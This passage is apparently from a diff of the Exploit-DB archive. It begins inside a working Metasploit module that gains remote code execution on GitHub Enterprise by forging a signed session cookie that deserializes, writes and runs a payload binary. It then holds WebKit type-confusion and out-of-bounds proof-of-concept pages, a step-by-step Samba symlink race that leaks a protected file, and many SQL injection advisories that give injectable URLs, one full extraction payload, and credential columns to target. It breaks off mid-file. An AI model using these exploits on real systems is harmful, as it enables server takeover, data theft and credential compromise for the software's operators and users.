include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Github Enterprise Default Session Secret And Deserialization Vulnerability",
|
||||
'Description' => %q{
|
||||
This module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6.
|
||||
The first is that the session management uses a hard-coded secret value, which can be
|
||||
abused to sign a serialized malicious Ruby object. The second problem is due to the
|
||||
use of unsafe deserialization, which allows the malicious Ruby object to be loaded,
|
||||
and results in arbitrary remote code execution.
|
||||
|
||||
This exploit was tested against version 2.8.0.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'iblue <iblue[at]exablue.de>', # Original discovery, writeup, and PoC (he did it all!)
|
||||
'sinn3r' # Porting the PoC to Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', '41616' ],
|
||||
[ 'URL', 'http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html' ],
|
||||
[ 'URL', 'https://enterprise.github.com/releases/2.8.7/notes' ] # Patched in this version
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Github Enterprise 2.8', { } ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true,
|
||||
'RPORT' => 8443
|
||||
},
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Mar 15 2017',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The base path for Github Enterprise', '/'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def secret
|
||||
'641dd6454584ddabfed6342cc66281fb'
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(target_uri.path, 'setup', 'unlock')
|
||||
res = send_request_cgi!({
|
||||
'method' => 'GET',
|
||||
'uri' => uri,
|
||||
'vars_get' =>{
|
||||
'redirect_to' => '/'
|
||||
}
|
||||
})
|
||||
|
||||
unless res
|
||||
vprint_error('Connection timed out.')
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
unless res.get_cookies.match(/^_gh_manage/)
|
||||
vprint_error('No _gh_manage value in cookie found')
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
cookies = res.get_cookies
|
||||
vprint_status("Found cookie value: #{cookies}, checking to see if it can be tampered...")
|
||||
gh_manage_value = CGI.unescape(cookies.scan(/_gh_manage=(.+)/).flatten.first)
|
||||
data = gh_manage_value.split('--').first
|
||||
hmac = gh_manage_value.split('--').last.split(';', 2).first
|
||||
vprint_status("Data: #{data.gsub(/\n/, '')}")
|
||||
vprint_status("Extracted HMAC: #{hmac}")
|
||||
expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
|
||||
vprint_status("Expected HMAC: #{expected_hmac}")
|
||||
|
||||
if expected_hmac == hmac
|
||||
vprint_status("The HMACs match, which means you can sign and tamper the cookie.")
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def get_ruby_code
|
||||
b64_fname = "/tmp/#{Rex::Text.rand_text_alpha(6)}.bin"
|
||||
bin_fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}.bin"
|
||||
register_file_for_cleanup(b64_fname, bin_fname)
|
||||
p = Rex::Text.encode_base64(generate_payload_exe)
|
||||
|
||||
c = "File.open('#{b64_fname}', 'wb') { |f| f.write('#{p}') }; "
|
||||
c << "%x(base64 --decode #{b64_fname} > #{bin_fname}); "
|
||||
c << "%x(chmod +x #{bin_fname}); "
|
||||
c << "%x(#{bin_fname})"
|
||||
c
|
||||
end
|
||||
|
||||
|
||||
def serialize
|
||||
# We don't want to run this code within the context of Framework, so we run it as an
|
||||
# external process.
|
||||
# Brilliant trick from Brent and Adam to overcome the issue.
|
||||
ruby_code = %Q|
|
||||
module Erubis;class Eruby;end;end
|
||||
module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
|
||||
|
||||
erubis = Erubis::Eruby.allocate
|
||||
erubis.instance_variable_set :@src, \\"#{get_ruby_code}; 1\\"
|
||||
proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
|
||||
proxy.instance_variable_set :@instance, erubis
|
||||
proxy.instance_variable_set :@method, :result
|
||||
proxy.instance_variable_set :@var, "@result"
|
||||
|
||||
session =
|
||||
{
|
||||
'session_id' => '',
|
||||
'exploit' => proxy
|
||||
}
|
||||
|
||||
print Marshal.dump(session)
|
||||
|
|
||||
|
||||
serialized_output = `ruby -e "#{ruby_code}"`
|
||||
|
||||
serialized_object = [serialized_output].pack('m')
|
||||
hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, serialized_object)
|
||||
|
||||
return serialized_object, hmac
|
||||
end
|
||||
|
||||
def send_serialized_data(dump, hmac)
|
||||
uri = normalize_uri(target_uri.path)
|
||||
gh_manage_value = CGI.escape("#{dump}--#{hmac}")
|
||||
cookie = "_gh_manage=#{gh_manage_value}"
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => uri,
|
||||
'cookie' => cookie
|
||||
})
|
||||
|
||||
if res
|
||||
print_status("Server returned: #{res.code}")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
dump, hmac = serialize
|
||||
print_status('Serialized Ruby stager')
|
||||
|
||||
print_status('Sending serialized Ruby stager...')
|
||||
send_serialized_data(dump, hmac)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
Handy information:
|
||||
|
||||
To deobfuscate Github code, use this script:
|
||||
https://gist.github.com/wchen-r7/003bef511074b8bc8432e82bfbe0dd42
|
||||
|
||||
Github Enterprise's Rack::Session::Cookie saves the session data into a cookie using this
|
||||
algorithm:
|
||||
|
||||
* Takes the session hash (Json) in env['rack.session']
|
||||
* Marshal.dump the hash into a string
|
||||
* Base64 the string
|
||||
* Append a hash of the data at the end of the string to prevent tampering.
|
||||
* The signed data is saved in _gh_manage'
|
||||
|
||||
The format looks like this:
|
||||
|
||||
[ DATA ]--[ Hash ]
|
||||
|
||||
Also see:
|
||||
https://github.com/rack/rack/blob/master/lib/rack/session/cookie.rb
|
||||
|
||||
=end
|
56
platforms/multiple/dos/41741.html
Executable file
56
platforms/multiple/dos/41741.html
Executable file
|
@ -0,0 +1,56 @@
|
|||
<!--
|
||||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1036
|
||||
|
||||
There is a type confusion vulnerability when calling DateTimeFormat.format. This function is provided as a bound function by a getter in the DateTimeFormat class. Binding the function ensures that the this object is of the right type. However, when the bound function is called, it calls into user script when converting the date parameter, which can call Function.caller, obtaining the unbound function. This type unsafe function can then be called on any type.
|
||||
|
||||
A minimal PoC is as follows, and a full PoC is attached.
|
||||
|
||||
|
||||
var i = new Intl.DateTimeFormat();
|
||||
var q;
|
||||
|
||||
function f(){
|
||||
q = f.caller;
|
||||
return 10;
|
||||
}
|
||||
|
||||
|
||||
i.format({valueOf : f});
|
||||
|
||||
q.call(0x77777777);
|
||||
-->
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
|
||||
var date = new Date(Date.UTC(2012, 11, 20, 3, 0, 0));
|
||||
|
||||
var i = new Intl.DateTimeFormat();
|
||||
|
||||
//print(i);
|
||||
|
||||
var q;
|
||||
|
||||
function f(){
|
||||
|
||||
//print("in f");
|
||||
//print(f.caller);
|
||||
q = f.caller;
|
||||
return 10;
|
||||
}
|
||||
|
||||
try{
|
||||
i.format({valueOf : f});
|
||||
}catch(e){
|
||||
|
||||
//print("problem");
|
||||
|
||||
}
|
||||
|
||||
//print(q);
|
||||
q.call(0x77777777);
|
||||
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
55
platforms/multiple/dos/41742.html
Executable file
55
platforms/multiple/dos/41742.html
Executable file
|
@ -0,0 +1,55 @@
|
|||
<!--
|
||||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1032
|
||||
|
||||
If a builtin script in webkit is in strict mode, but then calls a function that is not strict, this function is allowed to call Function.caller and can obtain a reference to the strict function. This is inconsistent with the behavior when executing non-builtin scripts in Safari, and the behavior in other browsers, where having a single strict function on the call stack forbids calls to Function.caller up to and including the first call to a strict function. This difference allows several sensitive native functions, such as arrayProtoPrivateFuncAppendMemcpy to be called directly, without the JavaScript wrappers that provide type and length checks.
|
||||
|
||||
A minimal example of this issue is as follows, and a full example is attached.
|
||||
|
||||
var q;
|
||||
function g(){
|
||||
q = g.caller;
|
||||
return 7;
|
||||
}
|
||||
|
||||
|
||||
var a = [1, 2, 3];
|
||||
a.length = 4;
|
||||
Object.defineProperty(Array.prototype, "3", {get : g});
|
||||
[4, 5, 6].concat(a);
|
||||
q(0x77777777, 0x77777777, 0);
|
||||
|
||||
|
||||
I strongly recommend this issue be fixed by changing the behaviour of Function.caller in strict mode, versus making changes to the natives, as it likely causes many similar problems
|
||||
-->
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
|
||||
var q;
|
||||
function g(){
|
||||
//print("in g");
|
||||
//print(arguments.caller);
|
||||
//print(g.caller);
|
||||
q = g.caller;
|
||||
//print(g.caller);
|
||||
return 7;
|
||||
|
||||
}
|
||||
|
||||
var a = [1, 2, 3];
|
||||
|
||||
Object.defineProperty( Array.prototype, "1", { get : g} );
|
||||
|
||||
|
||||
var a = [1, 2, 3];
|
||||
a.length = 4;
|
||||
Object.defineProperty(Array.prototype, "3", {get : g});
|
||||
|
||||
[4, 5, 6].concat(a);
|
||||
alert(q);
|
||||
q(0x7777, 0x7777, 0);
|
||||
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
70
platforms/multiple/dos/41743.html
Executable file
70
platforms/multiple/dos/41743.html
Executable file
|
@ -0,0 +1,70 @@
|
|||
<!--
|
||||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1033
|
||||
|
||||
There is an out-of-bounds read when reading the bound arguments array of a bound function. When Function.bind is called, the arguments to the call are transferred to an Array before they are passed to JSBoundFunction::JSBoundFunction. Since it is possible that the Array prototype has had a setter added to it, it is possible for user script to obtain a reference to this Array, and alter it so that the length is longer than the backing native butterfly array. Then when boundFunctionCall attempts to copy this array to the call parameters, it assumes the length is not longer than the allocated array (which would be true if it wasn't altered), and reads out of bounds.
|
||||
|
||||
This is likely exploitable, because the read values are treated as JSValues, so this issue can allow type confusion if the attacker controls any of the unallocated values that are read.
|
||||
|
||||
This issue is only in WebKit trunk and Safari preview, it hasn't made it to regular Safari releases yet.
|
||||
|
||||
|
||||
A minimal PoC is as follows, and a full PoC is attached.
|
||||
|
||||
|
||||
var ba;
|
||||
|
||||
function s(){
|
||||
ba = this;
|
||||
}
|
||||
|
||||
|
||||
function dummy(){
|
||||
alert("just a function");
|
||||
}
|
||||
|
||||
|
||||
Object.defineProperty(Array.prototype, "0", {set : s });
|
||||
var f = dummy.bind({}, 1, 2, 3, 4);
|
||||
ba.length = 100000;
|
||||
f(1, 2, 3);
|
||||
-->
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
|
||||
var ba;
|
||||
|
||||
function s(){
|
||||
alert("in s");
|
||||
ba = this;
|
||||
}
|
||||
|
||||
|
||||
function g(){
|
||||
alert("in g");
|
||||
return 7;
|
||||
}
|
||||
|
||||
|
||||
function dummy(){
|
||||
alert("just a function");
|
||||
}
|
||||
|
||||
alert("start");
|
||||
|
||||
try{
|
||||
Object.defineProperty(Array.prototype, "0", {set : s, get : g});
|
||||
var f = dummy.bind({}, 1, 2, 3, 4);
|
||||
alert("ba" + ba);
|
||||
ba.length = 100000;
|
||||
f(1, 2, 3);
|
||||
}catch(e){
|
||||
|
||||
alert(e.message);
|
||||
|
||||
}
|
||||
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
94
platforms/multiple/remote/41740.txt
Executable file
94
platforms/multiple/remote/41740.txt
Executable file
|
@ -0,0 +1,94 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1039
|
||||
|
||||
The Samba server is supposed to only grant access to configured share
|
||||
directories unless "wide links" are enabled, in which case the server is allowed
|
||||
to follow symlinks. The default (since CVE-2010-0926) is that wide links are
|
||||
disabled.
|
||||
|
||||
smbd ensures that it isn't following symlinks by calling lstat() on every
|
||||
path component, as can be seen in strace (in reaction to the request
|
||||
"get a/b/c/d/e/f/g/h/i/j", where /public is the root directory of the share):
|
||||
|
||||
root@debian:/home/user# strace -e trace=file -p18954
|
||||
Process 18954 attached
|
||||
lstat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
|
||||
getcwd("/public", 4096) = 8
|
||||
lstat("/public/a", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
|
||||
lstat("/public/a/b", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
|
||||
lstat("/public/a/b/c", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
|
||||
lstat("/public/a/b/c/d", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
|
||||
lstat("/public/a/b/c/d/e", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
|
||||
lstat("/public/a/b/c/d/e/f", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
|
||||
lstat("/public/a/b/c/d/e/f/g", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
|
||||
lstat("/public/a/b/c/d/e/f/g/h", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
|
||||
lstat("/public/a/b/c/d/e/f/g/h/i", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
|
||||
lstat("/public/a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
|
||||
stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
|
||||
getxattr("a/b/c/d/e/f/g/h/i/j", "system.posix_acl_access", 0x7ffc8d870c30, 132) = -1 ENODATA (No data available)
|
||||
stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
|
||||
open("a/b/c/d/e/f/g/h/i/j", O_RDONLY) = 35
|
||||
|
||||
|
||||
This is racy: Any of the path components - either one of the directories or the
|
||||
file at the end - could be replaced with a symlink by an attacker over a second
|
||||
connection to the same share. For example, replacing a/b/c/d/e/f/g/h/i
|
||||
with a symlink to / immediately before the open() call would cause smbd to open
|
||||
/j.
|
||||
|
||||
To reproduce:
|
||||
|
||||
- Set up a server with Samba 4.5.2. (I'm using Samba 4.5.2 from Debian
|
||||
unstable. I'm running the attacks on a native machine while the server is
|
||||
running in a VM on the same machine.)
|
||||
- On the server, create a world-readable file "/secret" that contains some
|
||||
text. The goal of the attacker is to leak the contents of that file.
|
||||
- On the server, create a directory "/public", mode 0777.
|
||||
- Create a share named "public", accessible for guests, writable, with path
|
||||
"/public".
|
||||
- As the attacker, patch a copy of the samba-4.5.2 sourcecode with the patch in
|
||||
attack_commands.patch.
|
||||
- Build the patched copy of samba-4.5.2. The built smbclient will be used in
|
||||
the following steps.
|
||||
- Prepare the server's directory layout remotely and start the rename side of
|
||||
the race:
|
||||
|
||||
$ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public
|
||||
./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it
|
||||
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian]
|
||||
smb: \> posix
|
||||
Server supports CIFS extensions 1.0
|
||||
Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt
|
||||
smb: /> ls
|
||||
. D 0 Wed Dec 14 23:54:30 2016
|
||||
.. D 0 Wed Dec 14 13:02:50 2016
|
||||
|
||||
98853468 blocks of size 1024. 66181136 blocks available
|
||||
smb: /> symlink / link
|
||||
smb: /> mkdir normal
|
||||
smb: /> put /tmp/empty normal/secret # empty file
|
||||
putting file /tmp/empty as /normal/secret (0.0 kb/s) (average 0.0 kb/s)
|
||||
smb: /> rename_loop link normal foobar
|
||||
|
||||
- Over a second connection, launch the read side of the race:
|
||||
|
||||
$ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public
|
||||
./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it
|
||||
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian]
|
||||
smb: \> posix
|
||||
Server supports CIFS extensions 1.0
|
||||
Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt
|
||||
smb: /> dump foobar/secret
|
||||
|
||||
- At this point, the race can theoretically be hit. However, because the
|
||||
renaming client performs operations synchronously, the network latency makes
|
||||
it hard to win the race. (It shouldn't be too hard to adapt the SMB client to
|
||||
be asynchronous, which would make the attack much more practical.) To make it
|
||||
easier to hit the race, log in to the server as root and run "strace" against
|
||||
the process that is trying to access foobar/secret all the time without any
|
||||
filtering ("strace -p19624"). On my machine, this causes the race to be hit
|
||||
every few seconds, and the smbclient that is running the "dump" command
|
||||
prints the contents of the file each time the race is won.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41740.zip
|
21
platforms/php/webapps/41724.txt
Executable file
21
platforms/php/webapps/41724.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
# # # # #
|
||||
# Exploit Title: Just Another Video Script 1.4.3 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 25.03.2017
|
||||
# Vendor Homepage: http://justanothervideoscript.com/
|
||||
# Software: http://justanothervideoscript.com/demo
|
||||
# Demo: http://javsdemo.com/
|
||||
# Version: 1.4.3
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# #ihsansencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/ajaxglobalfunc.php?func=addfav&vid_id=[SQL]
|
||||
# http://localhost/[PATH]/ajaxglobalfunc.php?func=flag&vid_id=[SQL]
|
||||
# http://localhost/[PATH]/ajaxplay.php?vidid=[SQL]
|
||||
# # # # #
|
||||
|
20
platforms/php/webapps/41725.txt
Executable file
20
platforms/php/webapps/41725.txt
Executable file
|
@ -0,0 +1,20 @@
|
|||
# # # # #
|
||||
# Exploit Title: Adult Tube Video Script - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 25.03.2017
|
||||
# Vendor Homepage: http://www.boysofts.com/
|
||||
# Software: http://www3.boysofts.com/xxx/freeadultvideotubescript.zip
|
||||
# Demo: http://www.boysofts.com/2013/12/free-adult-tube-video-script.html
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# #ihsansencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/single-video.php?video_id=[SQL]
|
||||
# http://localhost/[PATH]/search.php?page=[SQL]
|
||||
# single-video.php?video_id=25404991'+And(SelecT+1+FroM+(SelecT+CoUnT(*),ConCAT((SelecT(SelecT+ConCAT(CAST(DatabasE()+As+ChAr),0x7e,0x496873616e2053656e63616e))+FroM+information_schema.tables+WhErE+table_schema=DatabasE()+LImIt+0,1),FLooR(RanD(0)*2))x+FroM+information_schema.tables+GrOuP+By+x)a)++and+'userip'='userip
|
||||
# # # # #
|
21
platforms/php/webapps/41726.txt
Executable file
21
platforms/php/webapps/41726.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
# # # # #
|
||||
# Exploit Title: Alibaba Clone Script - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 26.03.2017
|
||||
# Vendor Homepage: http://eagletechnosys.com/
|
||||
# Software: http://b2bbusinessdirectoryscript.com/alibaba-clone-script.html
|
||||
# Demo: http://thealidemox.com
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# #ihsansencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL]
|
||||
# http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL]
|
||||
# http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL]
|
||||
# Etc...
|
||||
# # # # #
|
22
platforms/php/webapps/41727.txt
Executable file
22
platforms/php/webapps/41727.txt
Executable file
|
@ -0,0 +1,22 @@
|
|||
# # # # #
|
||||
# Exploit Title: B2B Marketplace Script v2.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 26.03.2017
|
||||
# Vendor Homepage: http://eagletechnosys.com/
|
||||
# Software: http://eaglescripts.com/php-b2b-marketplace-script-v2
|
||||
# Demo: http://demob2b.xyz/
|
||||
# Version: 2.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# #ihsansencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL]
|
||||
# http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL]
|
||||
# http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL]
|
||||
# Etc...
|
||||
# # # # #
|
||||
|
19
platforms/php/webapps/41728.txt
Executable file
19
platforms/php/webapps/41728.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Real Estate Property Pro Script - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 26.03.2017
|
||||
# Vendor Homepage: http://eagletechnosys.com/
|
||||
# Software: http://www.eaglescripts.com/php-property-portal-script
|
||||
# Demo: http://realpro.phpscriptsdemo.com/
|
||||
# Version: Pro
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# #ihsansencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/adsearch.html?&prc_min=[SQL]&prc_max=[SQL]
|
||||
# Etc...
|
||||
# # # # #
|
27
platforms/php/webapps/41729.txt
Executable file
27
platforms/php/webapps/41729.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
# # # # #
|
||||
# Exploit Title: Courier Tracking Software v6.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 26.03.2017
|
||||
# Vendor Homepage: http://eagletechnosys.com/
|
||||
# Software: http://www.eaglescripts.com/courier-tracking-software-ver-6
|
||||
# Demo: http://courierv6.couriersoftwares.com/
|
||||
# Version: 6.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# #ihsansencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/eaglecov6.php?c=other&f=show_news_details&view_id=[SQL]
|
||||
# http://localhost/[PATH]/eaglecov6.php?c=homepage&f=services&ser_id=[SQL]
|
||||
# user:username
|
||||
# user:hub_name
|
||||
# user:password
|
||||
# user:hidden_pass
|
||||
# user:entrydate
|
||||
# user:onlinestatus
|
||||
# user:status
|
||||
# Etc...
|
||||
# # # # #
|
19
platforms/php/webapps/41730.txt
Executable file
19
platforms/php/webapps/41730.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Parcel Delivery Booking Script v1.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 26.03.2017
|
||||
# Vendor Homepage: http://eagletechnosys.com/
|
||||
# Software: http://www.eaglescripts.com/parcel-delivery-booking-script
|
||||
# Demo: http://parceldelivery.phpscriptsdemo.com/
|
||||
# Version: 1.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# #ihsansencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/add_booking_shipment_first_step/1/1/1/1[SQL]
|
||||
# Etc...
|
||||
# # # # #
|
19
platforms/php/webapps/41731.txt
Executable file
19
platforms/php/webapps/41731.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Delux Same Day Delivery Script v1.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 26.03.2017
|
||||
# Vendor Homepage: http://eagletechnosys.com/
|
||||
# Software: http://www.eaglescripts.com/delux-same-day-delivery
|
||||
# Demo: http://deluxesameday.logistic-softwares.com/
|
||||
# Version: 1.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# #ihsansencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/show_page/[PAGE][SQL]
|
||||
# Etc...
|
||||
# # # # #
|
27
platforms/php/webapps/41732.txt
Executable file
27
platforms/php/webapps/41732.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
# # # # #
|
||||
# Exploit Title: Hotel & Tour Package Script v1.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 26.03.2017
|
||||
# Vendor Homepage: http://eagletechnosys.com/
|
||||
# Software: http://www.eaglescripts.com/hotel-booking-script
|
||||
# Demo: http://hotelbooking.phpscriptsdemo.com/
|
||||
# Version: 1.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# #ihsansencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/?show=view_offer&offer_id=[SQL]
|
||||
# http://localhost/[PATH]/view_news.php?news_id=[SQL]
|
||||
# http://localhost/[PATH]/page.php?id=[SQL]
|
||||
# http://localhost/[PATH]/?show=view_room&room_id=[SQL]
|
||||
# admin:id
|
||||
# admin:username
|
||||
# admin:password
|
||||
# booking:id
|
||||
# booking:cat_name
|
||||
# Etc...
|
||||
# # # # #
|
20
platforms/php/webapps/41733.txt
Executable file
20
platforms/php/webapps/41733.txt
Executable file
|
@ -0,0 +1,20 @@
|
|||
# # # # #
|
||||
# Exploit Title: Tour Package Booking v1.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 26.03.2017
|
||||
# Vendor Homepage: http://eagletechnosys.com/
|
||||
# Software: www.eaglescripts.com/tour-package-booking-script
|
||||
# Demo: http://tourbooking.phpscriptsdemo.com/
|
||||
# Version: 1.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# #ihsansencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/package/category/1[SQL]
|
||||
# http://localhost/[PATH]/package_detail/1[SQL]
|
||||
# Etc...
|
||||
# # # # #
|
18
platforms/php/webapps/41735.txt
Executable file
18
platforms/php/webapps/41735.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Professional Bus Booking Script - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 27.03.2017
|
||||
# Vendor Homepage: http://travelbookingscript.com/
|
||||
# Software: http://travelbookingscript.com/professional-bus-booking-script.html
|
||||
# Demo: http://travelbookingscript.com/demo/professional/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# #ihsansencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
|
||||
# # # # #
|
23
platforms/php/webapps/41736.txt
Executable file
23
platforms/php/webapps/41736.txt
Executable file
|
@ -0,0 +1,23 @@
|
|||
# # # # #
|
||||
# Exploit Title: CouponPHP Script v3.1 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 27.03.2017
|
||||
# Vendor Homepage: http://couponphp.com/
|
||||
# Software: http://couponphp.com/demos
|
||||
# Demo: http://newdemo2.couponphp.com
|
||||
# Demo: http://newdemo3.couponphp.com
|
||||
# Version: 3.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
